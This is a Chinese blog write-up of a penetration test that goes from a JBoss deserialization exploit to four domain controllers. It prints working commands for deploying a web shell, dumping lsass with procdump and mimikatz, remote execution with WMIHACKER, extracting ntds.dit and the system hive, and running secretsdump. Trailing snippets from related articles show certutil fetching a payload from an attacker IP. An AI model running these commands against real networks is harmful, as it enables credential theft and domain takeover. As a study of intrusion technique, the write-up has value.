<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    CVE到內網然后拿下4個域控

    VSole2022-05-07 22:12:13

    0x00 前言

    這次滲透測試是從一個CVE開始的,從CVE到內網然后到域控!手法簡單!還是要多學習哈哈哈哈!啊啊啊,我想開學了!為什么不開學

    0x01 一切從CVE開始

    這個滲透測試的是通過JBoss的CVE反序列化漏洞進去的,然后通過一步一步的橫向滲透獲取了兩個域控!首先對發現了該站點有JBoss頁面,經過測試發現具有JBoss反序列化漏洞。

    使用網上提供的EXP和利用方法,在VPS上面獲取了一個shell。這里看到對方是windows系統,當前用戶權限是管理員權限。并且該機器具有四張網卡,通向了四個網段!

    查看該機器的系統信息,發現是一臺Windows 10 的服務器,并且該機器是在域環境里面的!

    接著本來想直接上線CobaltStrike的,但是測試了很久都無發上線,這里應該是有殺軟之類的攔截了!那么我當前的思路就是通過這個反彈回來的shell 找到JBoss的部署路徑部署war包的木馬了

    ../../../server/default/deploy 

    jar -cvf shell.war shell.jsp

    一切順利,也成功在冰蝎上連接上了部署上去的木馬。真的是nice啊![ 暴龍點贊 ]

    接著我上傳了一個對免殺效果還是挺OK的馬兒上去!但是也被殺了!看了免殺不到位啊。這里使用只能通過當前管理員權限創建一個用戶,代理進入內網通過3389進去到對方機器了!

    然后再使用冰蝎上傳代理工具上去,進行兩端連接之后成功登陸進入到對方的機器上面

    進去之后發現對方開啟的殺軟是微軟自帶的殺毒軟件!好家伙這個東西也太強了了吧![暴龍暈了] 但是我當前創建的用戶無法關閉這個微軟自帶的殺軟!。由于是windows10的系統,我通過procdump獲取lsass.exe里面的憑據下載下來,然后通過mimikatz獲取里面的信息

    procdump64.exe -accepteula -ma lsass.exe lsass.dmp
    

    接著下載下來使用mimikatz進行獲取數據,并且保存到log中

    mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
    

    并且再第二處也留下了用戶名和密碼!這里密碼收集起來可以后期可以進行利用。

    利用剛剛mimikatz獲取出來的用戶名和密碼登陸進入這臺具有四張網卡的JBoss主機上面!其實最強的免殺應該就是沒有殺軟吧哈哈哈哈哈![暴龍點贊] 利用該管理員用戶權限直接關閉微軟的自帶殺軟后上線CobaltStrike

    進去之后枚舉域,發現存在挺多域的。通過對內網445端口的掃描返回的信息發現內網中大多主機都是再域ANDXXXXX中

    直接ping 一下域名發現域控可能部署再192.168.1.5中,但是使用其他工具并不能獲取到準確的域控信息

    接著對內網的主機進行信息探測,對四個網段進行了探測掃描,發現192.168.1.0/24網段的主機很多ms17-010。并且windows7的主機比較多,但是依次對其進行ms17-010攻擊并不能獲取到shell。這里推測是殺軟或者防火墻的鍋。但是在192.168.8.0/24網段中成功打中了一臺windows 2008服務器。

    接著load上去mimikatz直接獲取里面的憑證信息,并且獲取到了明文的憑證信息(原諒我這懶惰的打碼)

    對這臺主機進行3389端口掃描發現器開啟了3389端口,遠程登陸進去發現其不能出網!

    一開始在MSF里面執行一些操作也是不能執行,發現進去之后有一個殺軟ESET,并且關閉殺軟需要密碼。(啊....這!)

    首先我想了一個辦法,通過WEB機器遠程進去到這臺機器上面,通過遠程桌面自帶的磁盤共享分享木馬或者工具到這臺window 2008的系統上面。我首先把中轉木馬上去,直接被殺了!搞了一個免殺的密碼上去卻提示不能執行(啊!.... 原來我太菜了!)

    接著我直接上傳procdump獲取這臺主機的密碼。然后dump下來使用mimikatz獲取里面的數據。并且對這些密碼進行了整理!接著使用CobaltStrike的插件對內網主機進行暴力破解,破解192.168.1.0/24網段有挺多主機是相同密碼的。

    接著上線了這里面的兩臺主機分別是192.168.1.46和192.168.1.180。接下來可以對這兩臺主機進行信息搜集。

    登陸192.168.1.96和192.168.1.120發現是一臺VNC登陸的機器。里面是登陸一臺Linux,而且好像是虛擬機

    接著使用遠程桌面也上線一臺win7主機。IP地址為192.168.1.203。但是是工作組的機器,應該是機器了

    接著對192.168.1.0/24網段進行ssh主機的弱口令掃描。發現如下可以連接

    接著對192.168.5.0/24網段進行爆破。爆破出了一個我沒有登陸過的主機192.168.1.193

    登陸進去是一個Windows 2008的操作系統,并且這個主機有一張網卡是100.0.0.101的IP。這里又通向新的網段

    并且可能這臺機器還是一臺管理的機器,可以監控這幾個網段的機器!

    接著對192.168.8.0/24進行暴力破解。發現也是可以登陸進去一個主機

    進去之后發現它的IP地址是192.168.1.90。可以看到它這些網段大多數主機都是相同的。接著來可以對這臺主機進行密碼獲取。然后再對密碼進行收集整理。再進行爆破

    在這臺主機發現他這里有遠程桌面到其他主機,對方是Linux主機,這臺應該就是管理機器了吧

    接著還可以對內網資產進行掃描,發現了現內網很多JBoss但是主機都已經獲取權限下來了!并且192.168.1.0/24這個網段很多永恒之藍,但是都打不通,我懷疑就是殺軟的鍋,把payload 攔截了!

    接著遠程連接到192.168.1.134主機上面,這臺主機沒有什么服務,管理員應該不怎么搭理。但是在192.168.1.134這臺主機這里它有共享磁盤給192.168.1.122。之前對192.168.1.122爆破到了密碼,但是通過445并不能連接進去,這里通過WMIHACKER的進行135端口連接居然成功了!

    項目地址:https://github.com/360-Linton-Lab/WMIHACKER
    cscript //nologo WMIHACKER_0.6.vbs /shell 192.168.1.26 administrator "password"
    

    接著上傳一個procdump到對方主機上面。命令如下

    cscript //nologo WMIHACKER_0.6.vbs /upload 192.168.1.122 administrator "password" "C:\Windows\Temp\procdump64.exe" "C:\Windows\Temp\procdump64.exe"
    

    我直接查看一些遠程連接,發現由遠程連接記錄。然后打開遠程桌面發現這里留有遠程登陸192.168.1.122的記錄

    但是使用mimikatz獲取RPD憑證無果!!

    接著我使用登陸192.168.1.134的密碼登陸進入了192.168.1.122。這也太巧了吧!

    接著通過遠程桌面登陸進去了192.168.1.122。這里推測管理員應該是做了策略只允許192.168.1.134登陸這臺機器,在一開始遠程RDP卻登陸不了192.168.1.122。進去之后發現是一個子域。真的是太幸運了!但是對方主機不能上線,這個域控開啟了eset和微軟的殺軟,這里我直接拖下它的dmp獲取密碼hash。最后發現其192.168.1.134一個存儲服務器,192.168.1.122里面的數據都通向192.168.1.134。

    接著可以通過導出這個域控的ntds.dit文件出來獲取域控krbtgt的hash出來

    #創建快照,該快照包含Windows中的所有文件,且在復制時不會受到Windows鎖定機制的影響
    ntdsutil snapshot "activate instance ntds" create quit quit
    #加載剛剛創建的快照,GUID是上一步創建快照的GUID,會生成一個掛載目錄
    ntdsutil snapshot "mount  {c668674b-0a7d-4b97-bef1-4fb58f683e57} " quit quit
    #使用copy命令將快照中的文件復制到 c:tds.dit
    copy  C:\$SNAP_202008160748_VOLUMEC$\\windowstdstds.dit c:tds.dit
    #將之前加載的快照卸載并刪除
    ntdsutil snapshot "mount {c668674b-0a7d-4b97-bef1-4fb58f683e57}" "delete 2beb2b98-2375-46b5-a618-d4193f9f9610}" quit quit
    #再次查詢當前系統中的所有快照,顯示沒有任何快照,表示快照刪除成功
    ntdsutil snapshot "List All" quit quit
    

    接著在域控導出ntds.dit后,還需要導出system.hive。因為system.hive中存放著ntds.dit的密鑰。

    reg save hklm\system c:\system
    

    使用 impacket 工具包中的 secretdump.py 也可以解析 ntds.dit 文件,導出散列值。

    impacket-secretsdump -system system -ntds ntds.dit LOCAL
    

    接著通過krbtgt的hash制作黃金票據。

    但是使用CS的批量上線都上線不了,要不就是對445進行了端口過濾,要么就是有殺軟之類的禁止了上線。然后對域中的SPN進行掃描,發現了192.168.1.5開啟了MSSQL服務。然后想起來之前看到有機器的MSSQL的密碼是和機器登陸的密碼是一樣的,管理員應對密碼的復用率很高,接著我對密碼再次進行整理,對這個機器進行MSSQL暴力破解。成功登陸域控的MSSQL數據庫。

    接著開啟MSSQL的xp_cmdshell開提權進入到域控的機器里面

    幸運的是這里域控開啟的MSSQL服務是administrator權限的,免去了提權的操作。不然遇到ESET又要倒大霉了!

    既然是高權限,并且是出網的,我通過下載procdump到目標的主機然后獲取到lsass的文件下來,利用IPC$連接到192.168.1.134這臺機器上面把dump下來的文件copy到192.168.1.134這臺機器。使用mimikatz獲取明文密碼。然后使用密碼登陸進入到這臺域控中。之前使用MS14-068。沒有利用成功,卻通過MSSQL提權到了域控!![暴龍點贊]

    然后導出域控krbtgt的hash出來。再次通過IPC$連接把文件復制到192.168.1.134。接著在CS中下載到本地破解到域控中所有用戶的hash

    最后對域控和之前橫向獲取的主機進行密碼的整理,雖然不能通過445批量上線全部主機,但是對開啟了3389的主機進行登陸都是可以成功的登陸的!在192.168.1.0/24這個網段的主機 windows 7 居多是辦公網段!并且存在ms17-010,但是大多不能利用。

    0x02 結尾

    經過了這個漫長的寒暑假[是真的長!]終于可以回學校了!準備會很少寫博客了!接下來我的學習計劃就是想把Linux系統和Windows系統的知識在加強!希望能成為一個差不多的運維 ^_^ 接著就是11月份的網絡工程師哈哈哈!成為一個合格的網絡工程師 ^_^ ,接著在成為一個不合格的程序員哈哈哈哈!

    網段mimikatz
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    主要功能配合使用工具(如Mimikatz)掃描本地密碼,并將密碼寫入source/pass_list.txt 以下工具(1)簡稱(1)(1)檢測域。檢測到域后,工具 (2)自動使用 “net user /domain”等語法檢測判斷域用戶(3)探索其他存活域主機:自動將網段IP信息寫入source/ip_list.txt)語法:for /L %I in (1,1,254) DO @ping -w
    記一次常規的域滲透
    2023-03-30 09:48:11
    @#45""okkkkkkkkkk,嘗試登錄:發現卡巴斯基和edr,直接關閉:私密馬賽,我沒能關掉,嘗試通過導出密碼拿下高用戶的權限:reg save hklm\sam sam.hivereg save hklm\system system.hive本地secertdump解密這里我是從遠程桌面托文件下來所以很卡,只選擇下載了兩個文件,security可以選擇不下載:python secretsdump.py -system system.hive?
    主要記錄拿到Shell后再反彈MSF Shell、Mimikatz抓取密碼以及登錄域控等內網部分。前面漏洞環境搭建及打點等不作記錄,可查看參考文章。攻擊機利用Python開啟HTTP服務$ python -m SimpleHTTPServer 8080. 靶機CMD下載木馬文件$ certutil.exe -urlcache -split -f http://<攻擊者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻擊者IP>:<攻擊機監聽端口>. 并且需要遷移到權限為NT AUTHORITY\SYSTEM的進程,因為進程遷移后meterpreter的權限是遷移進程的權限。查看靶機位數&進程meterpreter > sysinfo # 查看位數。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010掃一下MS17-010meterpreter > background # 后臺掛起Session
    0x01 起源某天比較無聊,聽一個朋友推薦httpscan這款工具,于是就下載下來試試。首先對某學校網段開始進行測試,測試時發現有個比較特殊的標題,一般有這個,證明存在目錄遍歷。這個就又比較開心,看到了phpinfo,這個文件和目錄遍歷漏洞性質也差不多,說大也大,說小也小。phpinfo屬于處在信息收集階段的一個重頭,當有了這些信息,可以看出服務器端調用了那些庫,以及一些敏感路徑,從而進行深入的漏洞挖掘,用途也是很廣的。
    0x01 前言本文沒什么技術含量,純粹是無聊找國外的站點來練手,但是中途還是踩了點小坑,希望能幫到遇到同樣問題的師傅吧。先做個計劃任務權限維持,然后上fscan開掃。看了一下1.3主機開放了3389,不過系統是2016,不符合HASH傳遞登陸RDP的版本。所以可以直接嘗試HASH傳遞登陸RDP。其實理論上來說直接新建個用戶進去RDP劫持也是可以的,不過因為懶就沒試了
    0x00 前言這次滲透測試是從一個CVE開始的,從CVE到內網然后到域控!首先對發現了該站點有JBoss頁面,經過測試發現具有JBoss反序列化漏洞。使用網上提供的EXP和利用方法,在VPS上面獲取了一個shell。
    某集團后滲透實戰
    2022-01-12 15:24:31
    一次利用域的新漏洞攻擊排坑之旅
    記一次內網靶場學習
    2021-12-15 15:56:44
    記一次內網靶場學習
    一、環境配置靶機下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2攻擊示意圖:靶機統一使用虛擬機搭建web服務器:windows7 ip:192.168.52.143/192.168.154.152域成員:windows server 2003 ip:192.168.52.141域控:windows server 2008 ip:192.16
    #默認情況下,payload_inject執行之后會在本地產生一個新的handler,由于已經有了一個不需要再產生一個,所以這里設置為true. #這里是當前獲得的session的id. 可以看到 cs 成功接收到 shell右鍵 Interact 調出 beacon 界面,net view 查看當前域中計算機列表,然后執行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig四、制作木馬首先創建監聽器用于木馬回連,Host 為 cs 服務端的 ipAttacks->Packages->Windows Executable?需要派生的目標右擊選擇Spawn,然后創建一個?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类